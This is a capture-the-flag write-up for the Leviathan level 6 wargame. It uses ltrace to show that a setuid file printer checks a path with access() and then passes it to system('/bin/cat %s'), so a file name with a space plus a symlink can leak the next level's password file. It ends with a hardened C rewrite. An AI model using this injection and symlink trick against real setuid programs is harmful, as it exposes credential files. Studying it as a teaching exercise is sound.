leviathan level 6 wargame at intruded.net (6/8) wargames

The program for this level (printfile), located in /wargame, seems to print a file. If we run it:

level6@leviathan:/wargame$ ./printfile
*** File Printer ***
Usage: ./printfile filename

Trying to read the password of the next level...

level6@leviathan:/wargame$ ln -s /home/level7/.passwd /tmp/passwd
level6@leviathan:/wargame$ ./printfile /tmp/pass
You cant have that file...

That doesn't work... let's look at it with ltrace...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/passwd
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/passwd", 0)                         = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++

It checks the permissions before showing the file... OK, let's feed the program a file with the correct permissions...

level6@leviathan:/wargame$ echo "Hi" > /tmp/world
level6@leviathan:/wargame$ ./printfile /tmp/world

Seems to work fine; let's ltrace this...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/world
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/world", 0)                          = 0
snprintf("/bin/cat /tmp/world", 511, "/bin/cat %s", "/tmp/world") = 19
system("/bin/cat /tmp/world"Hi
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

It works: the program uses system() to show the contents, and builds the command string with snprintf...

Solution: building the command string with snprintf makes it possible to inject more commands :)

level6@leviathan:/wargame$ ltrace ./printfile "/tmp/hello world"
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/hello world", 0)                    = 0
snprintf("/bin/cat /tmp/hello world", 511, "/bin/cat %s", "/tmp/hello world") = 25
system("/bin/cat /tmp/hello world"/bin/cat: /tmp/hello: No such file or directory
/bin/cat: world: No such file or directory
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++

Watch this... access() is performed on the file "/tmp/hello world", but cat tries to read "/tmp/hello" and "world" :) Easy: create "hello world" with some garbage inside, and link hello to the passwd file :)
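
The root cause in the traces above is that access() checks one path, while the shell started by system() splits the same string into several words. As an added example (not the wargame's source code; print_file_safely is a hypothetical name), a file printer that drops both the separate check and the shell could look like this, assuming a setuid binary on Linux:

```c
/* Added example, not the wargame's source. print_file_safely is a hypothetical name. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy the file at `path` to out_fd. Returns 0 on success, -1 on refusal or error.
 * The path is only ever handed to open(), so a space in it is just a character. */
int print_file_safely(const char *path, int out_fd)
{
    uid_t saved_euid = geteuid();
    struct stat st;
    char buf[4096];
    ssize_t n, w, off;
    int fd, rc = -1;

    /* Open as the real (invoking) user: the permission check and the open are
     * one kernel operation on one path, replacing the separate access() call. */
    if (seteuid(getuid()) != 0) return -1;
    /* Policy choice in this example: refuse a symlink as the final component. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (seteuid(saved_euid) != 0) {   /* restore the setuid identity */
        if (fd >= 0) close(fd);
        return -1;
    }
    if (fd < 0) return -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode)) {   /* regular files only */
        rc = 0;
        while (rc == 0 && (n = read(fd, buf, sizeof buf)) != 0) {
            if (n < 0) { rc = -1; break; }
            for (off = 0; off < n; off += w)
                if ((w = write(out_fd, buf + off, (size_t)(n - off))) <= 0) { rc = -1; break; }
        }
    }
    close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "Usage: %s filename\n", argv[0]); return 2; }
    if (print_file_safely(argv[1], STDOUT_FILENO) != 0) {
        fputs("You cant have that file...\n", stderr);
        return 1;
    }
    return 0;
}
```

With this version a file named "hello world" is read as that one file, and a neighbouring "hello" symlink is never consulted.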

Posted at BinaryCell

